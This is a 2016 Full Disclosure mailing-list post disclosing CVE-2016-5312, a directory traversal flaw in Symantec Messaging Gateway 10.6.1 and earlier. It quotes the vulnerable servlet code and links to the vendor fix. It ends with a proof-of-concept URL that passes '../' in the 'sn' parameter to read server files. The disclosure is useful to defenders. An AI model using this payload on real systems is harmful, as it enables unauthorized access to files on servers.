[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Symantec Messaging Gateway <= 10.6.1 Directory Traversal
From: Rio Sherri <rio.sherri () fshnstudent ! info>
Date: 2016-09-28 6:52:25
Message-ID: CAKvdgaMoqENVeD9a66SLvV756nf_kFTnZDebNb72kHKUy9LtjA () mail ! gmail ! com
[Download RAW message or body]
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software :
https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# DESCRIPTION:
# A charting component in the Symantec Messaging Gateway control center
does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user
gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on
the server for which the user is not authorized.
["vulnerability.txt" (text/plain)]
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: \
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly \
sanitize user input submitted for charting requests. # This could potentially result in an \
authorized but less privileged user gaining access to paths outside the authorized directory. \
# This could potentially provide read access to some files/directories on the server for which \
the user is not authorized. #
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : \
com/ve/kavachart/servlet/ChartStream.java The vulnerable code is
extends HttpServlet {
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse \
httpServletResponse) { block6 : {
try {
String string = httpServletRequest.getParameter("sn");
//**** Taking parameter "sn" and writing it to the "string variable"
if (string == null) break block6;
String string2 = string.substring(string.length() - 3);
byte[] arrby = (byte[])this.getServletContext().getAttribute(string);
//**** The string variable is passed here without any sanitanization for \
directory traversal
//**** and you can successfully use this to do a directory traversal.
if (arrby != null) {
httpServletResponse.setContentType("image/" + string2);
ServletOutputStream servletOutputStream = \
httpServletResponse.getOutputStream(); httpServletResponse.setContentLength(arrby.length);
servletOutputStream.write(arrby);
this.getServletContext().removeAttribute(string);
break block6;
}
POC:
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic